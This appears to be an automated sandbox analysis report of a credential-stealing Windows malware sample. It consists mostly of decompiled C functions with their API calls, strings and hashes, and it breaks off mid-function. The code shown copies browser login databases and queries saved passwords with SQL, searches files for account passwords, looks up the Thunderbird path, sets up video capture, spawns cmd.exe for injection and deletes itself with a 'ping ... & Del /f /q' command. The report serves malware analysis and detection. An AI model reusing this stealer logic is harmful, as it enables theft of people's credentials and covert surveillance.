								_t58 =  &_v12; // 0x50
								_t136 =  *_t58;
								_t165 = _t147 + _t172;
								__eflags = _t165;
								while(1) {
									__eflags = _t104 - 0x7f;
									if(_t104 >= 0x7f) {
										goto L35;
									}
									__eflags = _t104 - 0x21;
									if(_t104 == 0x21) {
										goto L35;
									}
									 *((char*)(_t168 + _t136)) = _t104;
									_t168 = _t168 + 1;
									_t165 = _t165 + 1;
									_t104 =  *_t165;
									__eflags = _t104 - 0x20;
									if(_t104 > 0x20) {
										continue;
									}
									goto L35;
								}
								goto L35;
							}
							goto L28;
						}
						__eflags = _t141 - 7;
						if(_t141 <= 7) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x41;
						if( *((char*)(_t141 + _t175 - 7)) != 0x41) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x63;
						if( *((char*)(_t141 + _t175 - 6)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x63;
						if( *((char*)(_t141 + _t175 - 5)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x6f;
						if( *((char*)(_t141 + _t175 - 4)) != 0x6f) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x75;
						if( *((char*)(_t141 + _t175 - 3)) != 0x75) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x6e;
						if( *((char*)(_t141 + _t175 - 2)) != 0x6e) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x74;
						if( *((char*)(_t141 + _t175 - 1)) != 0x74) {
							goto L28;
						}
						__eflags =  *_t172 - 0xd0;
						_t125 = 2;
						_t169 = 9;
						_t126 =  !=  ? _t169 : _t125;
						_t170 = 0;
						_t127 = ( !=  ? _t169 : _t125) + _t135;
						_v20 = _t127;
						_t128 =  *((intOrPtr*)(_t127 + _t172));
						__eflags = _t128 - 0x20;
						if(_t128 <= 0x20) {
							L19:
							 *((char*)(_t170 + _a4)) = 0;
							goto L28;
						}
						_t177 = _v20 + _t172;
						__eflags = _t177;
						_v20 = _t177;
						_t173 = _t177;
						_t178 = _a4;
						while(1) {
							__eflags = _t128 - 0x7f;
							if(_t128 >= 0x7f) {
								break;
							}
							_t173 = _t173 + 1;
							 *((char*)(_t170 + _t178)) = _t128;
							_t170 = _t170 + 1;
							_t128 =  *_t173;
							__eflags = _t128 - 0x20;
							if(_t128 > 0x20) {
								continue;
							}
							break;
						}
						_t175 = _v28;
						_t172 = _v32;
						goto L19;
						L28:
						_t135 = _t135 + 1;
						__eflags = _t135 - _v16;
					} while (_t135 < _v16);
					goto L36;
				}
				GetLastError();
				return CloseHandle(_t174);
			}







































                                  0x0040924f
                                  0x00409267
                                  0x0040926c
                                  0x00409288
                                  0x0040928b
                                  0x00409294
                                  0x00409299
                                  0x0040929c
                                  0x004092a1
                                  0x004092a8
                                  0x004092b1
                                  0x004092b8
                                  0x004092c8
                                  0x004092d1
                                  0x004092db
                                  0x004092de
                                  0x004092e3
                                  0x004092e5
                                  0x004092ea
                                  0x004092ec
                                  0x004092ef
                                  0x004094da
                                  0x004094dd
                                  0x004094e5
                                  0x004094ec
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004092f5
                                  0x004092f5
                                  0x004092f5
                                  0x004092f8
                                  0x004092fb
                                  0x004092fd
                                  0x00000000
                                  0x00000000
                                  0x00409303
                                  0x00409306
                                  0x00000000
                                  0x00000000
                                  0x0040930c
                                  0x0040930f
                                  0x00409310
                                  0x00409312
                                  0x004093b1
                                  0x004093b6
                                  0x00000000
                                  0x00000000
                                  0x004093b8
                                  0x004093bd
                                  0x00000000
                                  0x00000000
                                  0x004093bf
                                  0x004093c4
                                  0x00000000
                                  0x00000000
                                  0x004093c6
                                  0x004093cb
                                  0x00000000
                                  0x00000000
                                  0x004093cd
                                  0x004093d2
                                  0x00000000
                                  0x00000000
                                  0x004093d4
                                  0x004093d9
                                  0x00000000
                                  0x00000000
                                  0x004093db
                                  0x004093e0
                                  0x00000000
                                  0x00000000
                                  0x004093e2
                                  0x004093e7
                                  0x004093f8
                                  0x004093fd
                                  0x00409400
                                  0x00409401
                                  0x00409404
                                  0x00409406
                                  0x00409409
                                  0x0040940c
                                  0x0040940e
                                  0x00409428
                                  0x00409428
                                  0x0040942b
                                  0x0040942d
                                  0x00409430
                                  0x00409433
                                  0x00409436
                                  0x0040943d
                                  0x00409442
                                  0x00409448
                                  0x0040945d
                                  0x00409465
                                  0x0040947a
                                  0x00409482
                                  0x0040948f
                                  0x0040949f
                                  0x004094a7
                                  0x004094b5
                                  0x004094bd
                                  0x004094c5
                                  0x004094cd
                                  0x004094d5
                                  0x00000000
                                  0x004094d5
                                  0x00409410
                                  0x00409410
                                  0x00409413
                                  0x00409413
                                  0x00409415
                                  0x00409415
                                  0x00409417
                                  0x00000000
                                  0x00000000
                                  0x00409419
                                  0x0040941b
                                  0x00000000
                                  0x00000000
                                  0x0040941d
                                  0x00409420
                                  0x00409421
                                  0x00409422
                                  0x00409424
                                  0x00409426
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409426
                                  0x00000000
                                  0x00409415
                                  0x00000000
                                  0x004093e7
                                  0x00409318
                                  0x0040931b
                                  0x00000000
                                  0x00000000
                                  0x00409321
                                  0x00409326
                                  0x00000000
                                  0x00000000
                                  0x0040932c
                                  0x00409331
                                  0x00000000
                                  0x00000000
                                  0x00409337
                                  0x0040933c
                                  0x00000000
                                  0x00000000
                                  0x00409342
                                  0x00409347
                                  0x00000000
                                  0x00000000
                                  0x0040934d
                                  0x00409352
                                  0x00000000
                                  0x00000000
                                  0x00409358
                                  0x0040935d
                                  0x00000000
                                  0x00000000
                                  0x00409363
                                  0x00409368
                                  0x00000000
                                  0x00000000
                                  0x0040936a
                                  0x0040936f
                                  0x00409372
                                  0x00409373
                                  0x00409376
                                  0x00409378
                                  0x0040937a
                                  0x0040937d
                                  0x00409380
                                  0x00409382
                                  0x004093a6
                                  0x004093a9
                                  0x00000000
                                  0x004093ad
                                  0x00409387
                                  0x00409387
                                  0x00409389
                                  0x0040938c
                                  0x0040938e
                                  0x00409391
                                  0x00409391
                                  0x00409393
                                  0x00000000
                                  0x00000000
                                  0x00409395
                                  0x00409396
                                  0x00409399
                                  0x0040939a
                                  0x0040939c
                                  0x0040939e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040939e
                                  0x004093a0
                                  0x004093a3
                                  0x00000000
                                  0x004093e9
                                  0x004093e9
                                  0x004093ea
                                  0x004093ea
                                  0x00000000
                                  0x004093f3
                                  0x0040926e
                                  0x00000000

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409261
                                  • GetLastError.KERNEL32 ref: 0040926E
                                  • CloseHandle.KERNEL32(00000000), ref: 00409275
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409282
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004092B1
                                  • CloseHandle.KERNEL32(00000000), ref: 004092B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreateErrorLastReadSize
                                  • String ID: Password$Password
                                  • API String ID: 1366138817-7788977
                                  • Opcode ID: 02e4cd267d463c9ce01359141e6fee23465ae678a7131a69feae321571df136d
                                  • Instruction ID: 0d079fec5c7f131bda1ced3cf5849022ba7cb4fed2040c8ba0bcc6ec81886411
                                  • Opcode Fuzzy Hash: 02e4cd267d463c9ce01359141e6fee23465ae678a7131a69feae321571df136d
                                  • Instruction Fuzzy Hash: 3F81F270C08246AEEB259B65C891BEE7B74AF09318F54817FE441BA2C3C77D5D828B19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004146E1, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 175comCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E004146E1(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v58;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v128;
				char _v144;
				intOrPtr _v148;
				char _v216;
				intOrPtr* _t63;
				intOrPtr* _t76;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				signed int _t103;
				intOrPtr* _t115;
				intOrPtr* _t118;
				void* _t121;

				_v28 = __ecx;
				__imp__CoInitialize(0);
				_t2 =  &_v24; // 0x414222
				_v12 = 0;
				_v16 = 0;
				_t118 = 0;
				_v20 = 0;
				_t89 = 0;
				_v24 = 0;
				_t115 = __imp__CoCreateInstance;
				_t63 =  *_t115(0x4175c0, 0, 1, 0x41a79c, _t2);
				_t7 =  &_v24; // 0x414222
				_t91 =  *_t7;
				if(_t91 == 0) {
					L8:
					_t92 = _v12;
					if(_t92 != 0) {
						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
						_v12 = _v12 & 0x00000000;
					}
					L10:
					_t93 = _v16;
					if(_t93 != 0) {
						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
						_v16 = _v16 & 0x00000000;
					}
					_t94 = _v20;
					if(_t94 != 0) {
						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
						_v20 = _v20 & 0x00000000;
					}
					_t56 =  &_v24; // 0x414222
					_t95 =  *_t56;
					if(_t95 != 0) {
						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
						_v24 = _v24 & 0x00000000;
					}
					if(_t118 != 0) {
						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
					}
					if(_t89 != 0) {
						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
					}
					__imp__CoUninitialize();
					return _t63;
				}
				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x4175a0,  &_v16);
				_t96 = _v16;
				if(_t96 == 0) {
					goto L8;
				}
				 *((intOrPtr*)( *_t96 + 4))(_t96);
				_t63 = E00414A12(_a4,  &_v12);
				if(_v12 == 0) {
					goto L10;
				}
				_t63 =  *_t115(0x417610, 0, 1, 0x41a78c,  &_v20);
				_t98 = _v20;
				if(_t98 != 0) {
					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");
					_t76 = _v20;
					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");
					E00401052( &_v144, 0, 0x48);
					_t22 =  &_v24; // 0x414222
					_t80 =  *_t22;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);
					_t63 = E0041462F();
					_t118 = _t63;
					if(_t118 != 0) {
						_t63 = E0041464B();
						_t89 = _t63;
						if(_t89 != 0) {
							_t103 = _v20;
							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);
							if(_t63 >= 0) {
								_t31 =  &_v24; // 0x414222
								_t82 =  *_t31;
								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);
								_t105 = _v148;
								_t113 = _v148 + 0x30;
								E0040102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
								E00414492( &_v216);
								_t63 = E00414AD1(_v28, _t113, _a4, _v64, _v68, _v58);
							}
						}
					}
				}
				goto L8;
			}































                                  0x004146ef
                                  0x004146f3
                                  0x004146f9
                                  0x004146fc
                                  0x00414708
                                  0x0041470b
                                  0x0041470d
                                  0x00414710
                                  0x00414712
                                  0x00414715
                                  0x00414720
                                  0x00414722
                                  0x00414722
                                  0x00414727
                                  0x00414851
                                  0x00414851
                                  0x00414856
                                  0x0041485b
                                  0x0041485e
                                  0x0041485e
                                  0x00414862
                                  0x00414862
                                  0x00414867
                                  0x0041486c
                                  0x0041486f
                                  0x0041486f
                                  0x00414873
                                  0x00414878
                                  0x0041487d
                                  0x00414880
                                  0x00414880
                                  0x00414884
                                  0x00414884
                                  0x00414889
                                  0x0041488e
                                  0x00414891
                                  0x00414891
                                  0x00414897
                                  0x0041489c
                                  0x0041489c
                                  0x004148a1
                                  0x004148a6
                                  0x004148a6
                                  0x004148a9
                                  0x004148b3
                                  0x004148b3
                                  0x00414739
                                  0x0041473b
                                  0x00414740
                                  0x00000000
                                  0x00000000
                                  0x00414749
                                  0x00414752
                                  0x0041475a
                                  0x00000000
                                  0x00000000
                                  0x00414771
                                  0x00414773
                                  0x00414778
                                  0x00414789
                                  0x0041478c
                                  0x0041479a
                                  0x004147a7
                                  0x004147b1
                                  0x004147b1
                                  0x004147c3
                                  0x004147c6
                                  0x004147c7
                                  0x004147c8
                                  0x004147d1
                                  0x004147d2
                                  0x004147d3
                                  0x004147d4
                                  0x004147d7
                                  0x004147dd
                                  0x004147e2
                                  0x004147e6
                                  0x004147eb
                                  0x004147f0
                                  0x004147f4
                                  0x004147f6
                                  0x004147fe
                                  0x00414803
                                  0x00414805
                                  0x00414805
                                  0x00414812
                                  0x00414815
                                  0x0041481d
                                  0x0041482a
                                  0x00414838
                                  0x0041484c
                                  0x0041484c
                                  0x00414803
                                  0x004147f4
                                  0x004147e6
                                  0x00000000

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 004146F3
                                  • CoCreateInstance.OLE32(004175C0,00000000,00000001,0041A79C,"BA), ref: 00414720
                                  • CoUninitialize.OLE32 ref: 004148A9
                                    • Part of subcall function 00414A12: CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?), ref: 00414A40
                                  • CoCreateInstance.OLE32(00417610,00000000,00000001,0041A78C,?), ref: 00414771
                                    • Part of subcall function 00414492: CoTaskMemFree.OLE32(?), ref: 004144A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                  • String ID: "BA$Grabber$Source$vids
                                  • API String ID: 533512943-1720631296
                                  • Opcode ID: 9e10a3957bbf15e7499bf9a219475944645554586d18aeaed1ebcb477bdb49d5
                                  • Instruction ID: 2c6567443aae3fa2ccd83cd9410249409bd9c9e0b512ace47bdcaa6ee1176714
                                  • Opcode Fuzzy Hash: 9e10a3957bbf15e7499bf9a219475944645554586d18aeaed1ebcb477bdb49d5
                                  • Instruction Fuzzy Hash: D7517F75A00209AFDB14EFA5C888EEEB7B9FF84305F14846EF915AB250C7759D40CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402A9C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106processthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00402A9C() {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				char _v352;
				char _v816;
				char _v817;
				char _v872;
				void* _t59;
				void* _t66;
				void* _t69;

				_t59 = _t66;
				_t69 = _t59;
				E004124D7(_t69 + 0x10);
				if( *((intOrPtr*)(_t69 + 0x68)) != 0) {
					TerminateThread( *0x559cb4, 0);
				}
				if( *((intOrPtr*)(_t69 + 0x50)) != 0) {
					E00412612(_t69 + 4,  *((intOrPtr*)(_t69 + 8)), _t69 + 0x14, 0x20006, 0);
					E004124F2(_t69 + 4, E004036F7( &_v8, L"Load"));
					E00405FEB(_v8);
					E00412554(_t69 + 4);
				}
				E00401052( &_v92, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetModuleFileNameA(0,  &_v352, 0x104);
				E0040102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
				E0040102C( &_v817, "\"", 1);
				E0040102C( &_v816,  &_v352, E00401133( &_v352));
				E0040102C(E00401133( &_v352) + 0x38 +  &_v872, "\"", 2);
				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitProcess(0);
			}













                                  0x00402a9c
                                  0x00412d01
                                  0x00412d06
                                  0x00412d10
                                  0x00412d19
                                  0x00412d19
                                  0x00412d22
                                  0x00412d36
                                  0x00412d4b
                                  0x00412d53
                                  0x00412d5a
                                  0x00412d5a
                                  0x00412d66
                                  0x00412d70
                                  0x00412d74
                                  0x00412d7a
                                  0x00412d7b
                                  0x00412d84
                                  0x00412d98
                                  0x00412dac
                                  0x00412dcc
                                  0x00412dec
                                  0x00412e0e
                                  0x00412e1d
                                  0x00412e22
                                  0x00412e25

                                  APIs
                                    • Part of subcall function 004124D7: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 004124DE
                                  • TerminateThread.KERNEL32(00000000,?,?), ref: 00412D19
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00412D84
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00412E0E
                                  • CloseHandle.KERNEL32(?), ref: 00412E1D
                                  • CloseHandle.KERNEL32(?), ref: 00412E22
                                  • ExitProcess.KERNEL32 ref: 00412E25
                                  Strings
                                  • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 00412D92
                                  • Load, xrefs: 00412D3B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                  • String ID: Load$cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                                  • API String ID: 3630425516-2018186591
                                  • Opcode ID: 723ffad1e99c6304dd55bc25b5baac8dfa4d878023762704fa3abc36bfc35486
                                  • Instruction ID: 037c922c3f030f8a7e2167b9092222fb162bc460f9f39b1e2300c97669b415f7
                                  • Opcode Fuzzy Hash: 723ffad1e99c6304dd55bc25b5baac8dfa4d878023762704fa3abc36bfc35486
                                  • Instruction Fuzzy Hash: 623167B1900619BFDB11EBA1CD86EEF777DFF04304F004476B205A6191DB78AE948BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413EBA, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 75sleepprocessmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00413EBA() {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				int _t10;
				void* _t23;
				int _t24;
				CHAR* _t26;

				_v8 = 0;
				_t10 = GetCurrentProcess();
				__imp__IsWow64Process(_t10,  &_v8);
				if(_t10 != 0) {
					if(_v8 == 0) {
						_t10 = E0041405F(_t23, __eflags);
						__eflags = _t10;
						if(_t10 != 0) {
							_t24 = _t10;
							goto L6;
						}
					} else {
						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
						GetWindowsDirectoryA(_t26, 0x104);
						E0040102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);
						E00401052( &_v100, 0, 0x44);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);
						if(_t10 != 0) {
							Sleep(0x3e8);
							_t24 = _v24.dwProcessId;
							L6:
							return E00413F7F(_t24);
						}
					}
				}
				return _t10;
			}










                                  0x00413ec9
                                  0x00413ecc
                                  0x00413ed3
                                  0x00413edb
                                  0x00413ee4
                                  0x00413f6a
                                  0x00413f6f
                                  0x00413f71
                                  0x00413f73
                                  0x00000000
                                  0x00413f73
                                  0x00413eea
                                  0x00413efd
                                  0x00413f05
                                  0x00413f1c
                                  0x00413f2b
                                  0x00413f35
                                  0x00413f39
                                  0x00413f3a
                                  0x00413f3b
                                  0x00413f50
                                  0x00413f58
                                  0x00413f5f
                                  0x00413f65
                                  0x00413f75
                                  0x00000000
                                  0x00413f75
                                  0x00413f58
                                  0x00413ee4
                                  0x00413f7e

                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,00000000,74A313FB,00000000), ref: 00413ECC
                                  • IsWow64Process.KERNEL32(00000000), ref: 00413ED3
                                  • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 00413EF7
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00413F05
                                  • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00413F13
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00413F50
                                  • Sleep.KERNEL32(000003E8), ref: 00413F5F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                  • String ID: \System32\cmd.exe
                                  • API String ID: 3151064845-2003734499
                                  • Opcode ID: ed219067b45a991398468e4a26b8bc153abac1b375d46e51515a851acaccb22f
                                  • Instruction ID: afe1c3a2dd0aca87645a04bed0ab53e4b63e38e155d51139ff1440feea8eaa1f
                                  • Opcode Fuzzy Hash: ed219067b45a991398468e4a26b8bc153abac1b375d46e51515a851acaccb22f
                                  • Instruction Fuzzy Hash: 6D1181B1A04309BFFB109BB59C49FEF767CEB08785F004036F605E6290DA789E458669
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B87D, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56registrystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B87D(WCHAR* __ecx, char* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				short _v536;
				char* _t32;
				WCHAR* _t33;

				_v12 = 0x104;
				_v16 = 1;
				_t32 = __edx;
				_t33 = __ecx;
				E00401052( &_v536, 0, 0x104);
				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
				lstrcatW( &_v536, _t33);
				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {
					return 0;
				}
				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
				RegCloseKey(_v8);
				return 1;
			}









                                  0x0040b891
                                  0x0040b89b
                                  0x0040b8a1
                                  0x0040b8a3
                                  0x0040b8a5
                                  0x0040b8b9
                                  0x0040b8c7
                                  0x0040b8e8
                                  0x00000000
                                  0x0040b910
                                  0x0040b8fd
                                  0x0040b906
                                  0x00000000

                                  APIs
                                  • lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040B8B9
                                  • lstrcatW.KERNEL32 ref: 0040B8C7
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                  • RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                  • RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                  Strings
                                  • thunderbird.exe, xrefs: 0040B8BF
                                  • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040B8B3
                                  • Path, xrefs: 0040B8F5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                  • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                  • API String ID: 3135247354-1374996286
                                  • Opcode ID: 145a1f37adbbfc8c3e5f119a952875368c6e1147b4b001a2de5ceb485c9eb7eb
                                  • Instruction ID: 3df0df8215fcb83d59d950a1b29e9a277ea2ca522fea2b5b845973b94dc247ed
                                  • Opcode Fuzzy Hash: 145a1f37adbbfc8c3e5f119a952875368c6e1147b4b001a2de5ceb485c9eb7eb
                                  • Instruction Fuzzy Hash: 7D111EB2A4020CBFDB10EBA5DD49FDA7BBCEB54344F1044B6B605E2190E6749F448BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BC0D, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 371fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E0040BC0D(intOrPtr __ecx, void* __eflags, char _a4, signed int _a8, char _a12, char _a16, intOrPtr _a20) {
				WCHAR* _v12;
				char _v16;
				WCHAR* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				char _v88;
				int _t148;
				intOrPtr* _t160;
				void* _t161;
				char _t165;
				char _t177;
				char _t178;
				char _t188;
				char* _t189;
				char* _t190;
				char* _t191;
				void* _t192;
				void* _t194;
				char _t198;
				char _t223;
				intOrPtr _t233;
				char* _t251;
				char* _t255;
				void* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				char _t331;
				WCHAR* _t337;
				intOrPtr _t338;
				void* _t339;
				void* _t340;

				_t343 = __eflags;
				_v24 = _v24 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_t233 = __ecx;
				_t322 = 0x1a;
				_v52 = __ecx;
				E00410C8A( &_v12, _t322, __eflags);
				_t329 = "\\";
				E0040357C( &_v12, _t322, __eflags, "\\");
				_t323 = 8;
				E00403447( &_v12, _t343, E004035B9( &_v48, _t323, _t343));
				E00405FEB(_v48);
				_t336 = L".tmp";
				E0040357C( &_v12, _t323, _t343, L".tmp");
				_t324 = 0x1a;
				E00410C8A( &_v20, _t324, _t343);
				E0040357C( &_v20, _t324, _t343, _t329);
				_t325 = 8;
				E00403447( &_v20, _t343, E004035B9( &_v48, _t325, _t343));
				E00405FEB(_v48);
				E0040357C( &_v20, _t325, _t343, _t336);
				_t344 = _a12;
				_t251 =  &_v48;
				if(_a12 == 0) {
					_push(0x1c);
				} else {
					_push(0x1a);
				}
				_pop(_t326);
				E00403549( &_v24, E00410C8A(_t251, _t326, _t344));
				E00405FEB(_v48);
				E0040357C( &_v24, _t326, _t344, _a4);
				_t345 = _a12;
				_t255 =  &_a12;
				if(_a12 == 0) {
					_push(0x1c);
				} else {
					_push(0x1a);
				}
				_pop(_t327);
				E00403549( &_v28, E00410C8A(_t255, _t327, _t345));
				E00405FEB(_a12);
				E0040357C( &_v28, _t327, _t345, _a8);
				_t148 = PathFileExistsW(_v24);
				_t337 = _v28;
				if(_t148 == 0 || PathFileExistsW(_t337) == 0 || CopyFileW(_v24, _v12, 0) == 0 || CopyFileW(_t337, _v20, 0) == 0) {
					L12:
					_t331 = 0;
					goto L13;
				} else {
					E00403549( &_v24,  &_v12);
					_t160 = E00403666( &_v24,  &_a12);
					_t161 =  *((intOrPtr*)(_t233 + 0x30))( *_t160,  &_v56);
					_t268 = _a12;
					E00405FEB(_a12);
					if(_t161 == 0) {
						_v32 = _v32 & 0x00000000;
						_a8 = _a8 & 0x00000000;
						_t165 = E0040C63E(_t268, _t268,  &_v32,  &_a8);
						_t340 = _t339 + 0x10;
						_t331 = 1;
						__eflags = _t165;
						if(_t165 == 0) {
							L36:
							 *((intOrPtr*)(_t233 + 0x60))();
							 *((intOrPtr*)(_t233 + 0x34))();
							E0040373F(_t340,  &_v12);
							E0041142A(_v56);
							E0040373F(_t340,  &_v20);
							E0041142A(_v16);
							L13:
							E00405FEB(_v20);
							E00405FEB(_v12);
							E00405FEB(_t337);
							E00405FEB(_v24);
							return _t331;
						}
						__eflags = _a16;
						_t176 =  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins";
						_t177 =  *((intOrPtr*)(_t233 + 0x38))(_v56,  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins", 0xffffffff,  &_v16, 0);
						_t340 = _t340 + 0x14;
						__eflags = _t177;
						if(_t177 != 0) {
							goto L36;
						}
						_t178 =  *((intOrPtr*)(_t233 + 0x44))(_v16);
						_pop(_t268);
						__eflags = _t178 - 0x64;
						if(_t178 != 0x64) {
							L35:
							__eflags = _t178;
							if(_t178 != 0) {
								goto L11;
							}
							goto L36;
						}
						_t338 = _t233;
						do {
							_a16 = E00405F68(_t331);
							_t335 = E00405F68(_t331);
							_a4 = _t186;
							_v48 = E00405F68(1);
							_t188 = E00405F68(1);
							_a12 = _t188;
							_t189 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 0);
							__eflags =  *_t189;
							if( *_t189 != 0) {
								E00403237( &_a4, E004034D1( &_v60, _t189));
								E00405FEB(_v60);
								_t335 = _a4;
							}
							_t190 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 1);
							__eflags =  *_t190;
							if( *_t190 != 0) {
								E00403237( &_v48, E004034D1( &_v64, _t190));
								E00405FEB(_v64);
							}
